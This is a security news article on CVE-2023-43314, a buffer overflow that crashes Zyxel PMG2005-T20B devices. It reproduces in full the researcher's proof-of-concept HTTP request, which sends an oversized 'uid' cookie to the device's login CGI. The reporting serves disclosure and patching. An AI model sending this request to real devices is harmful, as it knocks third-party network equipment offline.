Sunday, December 10, 2023

ZYXEL Buffer Overflow vulnerability Let Attacker Launch DoS Attack

ZYXEL has been discovered with a Buffer Overflow vulnerability on their ZYXEL-PMG2005-T20B device, which can result in a denial-of-service condition. This condition exists due to improper sanitization of user-supplied input on their HTTP request.

Zyxel is a Taiwanese multinational company that manufactures several networking products like Routers, DSL CPE, WiFi Systems, 5G NR/4G LTE CPE, Carrier and Access Switches, Network Extenders, and Network Management devices.

Technical Analysis

A threat actor can exploit this vulnerability by providing a crafted script to the uid parameter in the cgi-bin/login.asp, leading to a Buffer Overflow, eventually causing the DoS condition. This vulnerability has been assigned with the CVE as CVE-2023-43314, and the severity is being analyzed.


Deploy Advanced AI-Powered Email Security Solution

Implementing AI-Powered Email security solutions “Trustifi” can secure your business from today’s most dangerous email threats, such as Email Tracking, Blocking, Modifying, Phishing, Account Take Over, Business Email Compromise, Malware & Ransomware

This vulnerability arises in the ZYXEL-PMG2005-T20B product when the number of admin in the uid exceeds the maximum threshold of 50, which crashes the application when parsed in the backend. Additionally, the COOKIE header in the HTTP request is supplied with a SESSIONID parameter for creating a valid session with the ZYXEL product.

However, further analysis revealed that the ZYXEL-PMG2005-T20B product has reached End-of-Life as per the ZyXEL website. 

End-of-Life (Source: Cyber Security News)

The researcher created an HTTP request to replicate this vulnerability with the following parameters and values.

GET /cgi-bin/index.asp HTTP/1.1
Host: {HOST IP}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://{HOST IP}/cgi-bin/login.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: SESSIONID=4450a48a; uid=adminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadminadmin; psw=1234
Connection: close

This request to the ZyXEL product causes the Buffer Overflow due to the number of admin thresholds resulting in the Denial of Service condition. In addition to this, more than 20 URLs were listed by the security researcher, which were affected by the same vulnerability.

A GitHub repository, along with the proof-of-concept was published, which provides detailed information about this vulnerability, its existence, and other information. 

Users of this ZyXEL product are recommended to upgrade to the latest version of the product in order to prevent this vulnerability from getting exploited.

Protect yourself from vulnerabilities using Patch Manager Plus to quickly patch over 850 third-party applications. Take advantage of the free trial to ensure 100% security.


Latest articles

WordPress POP Chain Flaw Exposes Over 800M+ Websites to Attack

A critical remote code execution vulnerability has been patched as part of the Wordpress...

Russian Star Blizzard New Evasion Techniques to Hijack Email Accounts

Hackers target email accounts because they contain valuable personal and financial information. Successful email...

Exploitation Methods Used by PlugX Malware Revealed by Splunk Research

PlugX malware is sophisticated in evasion, as it uses the following techniques to avoid...

TA422 Hackers Attack Organizations Using Outlook & WinRAR Vulnerabilities

Hackers exploit Outlook and WinRAR vulnerabilities because these widely used software programs are lucrative...

Bluetooth keystroke-injection Flaw: A Threat to Apple, Linux & Android Devices

An unauthenticated Bluetooth keystroke-injection vulnerability that affects Android, macOS, and iOS devices has been...

Atlassian Patches RCE Flaw that Affected Multiple Products

Atlassian has been discovered with four new vulnerabilities associated with Remote Code Execution in...

Reflectiz Introduces AI-powered Insights on Top of Its Smart Alerting System

Reflectiz, a cybersecurity company specializing in continuous web threat management, proudly introduces a new...
Eswar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.

Endpoint Strategies for 2024 and beyond

Converge and Defend

What's the pulse of Unified Endpoint Management and Security (UEMS) in Europe? Join us live to uncover the strategies that are defining endpoint security in the region.

Related Articles